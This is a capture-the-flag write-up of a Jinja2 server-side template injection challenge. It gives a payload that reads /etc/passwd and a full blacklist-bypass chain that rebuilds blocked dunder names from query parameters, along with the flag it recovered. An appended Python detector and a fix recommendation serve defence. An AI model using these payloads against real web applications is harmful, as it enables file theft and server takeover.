Rating: 4.0

Looking at the website and its `data` parameter suggested some kind of injection.
My first thought was to try SSTI (server-side template injection):
`http://web.euristica.in/hard_to_hack/index?data={{7*7}}`
The server returned 49!
Also, as `{{'7'*7}}` works, we can conclude it is a Jinja template.

So I tried injecting a payload to read /etc/passwd and checked whether it works.
**payload**: `{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}` - FAILS

After trying different characters, I figured out that **class**, **mro**, **subclasses** and **_** were all **blacklisted**.

To bypass this, I came up with the following payload. The blacklisted strings never appear in the `data` parameter: `|attr()` replaces dotted attribute access, and each name is rebuilt at render time by `|format` from extra query parameters (`f=%s%sclass%s%s` with `a=_` becomes `__class__`, and likewise for `mro` and `subclasses`):

**Final Working Payload** `{{(((((request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)))|attr(request.args.m|format(request.args.a,request.args.a,request.args.a,request.args.a)))[8])|attr(request.args.k|format(request.args.a,request.args.a,request.args.a,request.args.a))())[40])(%27flag%27).read()}}&f=%s%sclass%s%s&a=_&m=%s%smro%s%s&k=%s%ssubclasses%s%s`

**Now make a request to read the flag:**

`http://web.euristica.in/hard_to_hack/index?data={{(((((request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)))|attr(request.args.m|format(request.args.a,request.args.a,request.args.a,request.args.a)))[8])|attr(request.args.k|format(request.args.a,request.args.a,request.args.a,request.args.a))())[40])(%27flag%27).read()}}&f=%s%sclass%s%s&a=_&m=%s%smro%s%s&k=%s%ssubclasses%s%s`

**FLAG**: `flag{BlackListing_N3Ver_H3lp3d_An40ne}`
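As an added example (not part of the original writeup), here is the kind of check the challenge's blacklist lacked, written from the defender's side: it URL-decodes every query parameter of the request above, re-applies the `%s` substitutions between parameters, and reports which sensitive dunder names become reachable. The sample URL is the writeup's own request; the function names are my own.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Dunder names the challenge blacklisted in the template text but which the
# bypass reassembled at render time from other query parameters.
SENSITIVE_NAMES = ("__class__", "__mro__", "__subclasses__", "__globals__", "__builtins__")

# The writeup's own request, used here as sample input for the check.
SAMPLE_URL = ("http://web.euristica.in/hard_to_hack/index?data={{(((((request|attr(request.args.f|format("
              "request.args.a,request.args.a,request.args.a,request.args.a)))|attr(request.args.m|format("
              "request.args.a,request.args.a,request.args.a,request.args.a)))[8])|attr(request.args.k|format("
              "request.args.a,request.args.a,request.args.a,request.args.a))())[40])(%27flag%27).read()}}"
              "&f=%s%sclass%s%s&a=_&m=%s%smro%s%s&k=%s%ssubclasses%s%s")

def query_values(url):
    """Every value of every query parameter, decoded a second time so that
    double-URL-encoded fragments are normalised as well."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [unquote(v) for vals in params.values() for v in vals]

def expand_format_fragments(values):
    """Apply printf-style '%s' fragments to each other parameter value, so that
    '%s%sclass%s%s' combined with '_' yields '__class__'. Returns the original
    values plus every successful expansion."""
    expanded = set(values)
    for fmt in values:
        n = fmt.count("%s")
        if n == 0:
            continue
        for filler in values:
            try:
                expanded.add(fmt % ((filler,) * n))
            except (TypeError, ValueError):
                pass  # fragment is not a usable format string for this filler
    return expanded

def ssti_indicators(url):
    """Names and patterns recoverable from the request as a whole, not only
    from the template parameter the blacklist inspected."""
    values = query_values(url)
    joined = "\n".join(expand_format_fragments(values))
    findings = sorted(name for name in SENSITIVE_NAMES if name in joined)
    if any("{{" in v and "|attr(" in v for v in values):
        findings.append("attr-filter-inside-template-delimiters")
    return findings

if __name__ == "__main__":
    print(ssti_indicators(SAMPLE_URL))
```

A check like this is only a detection aid; the actual fix is to never render a user-supplied string as the template itself, but to pass it to a fixed template as a variable.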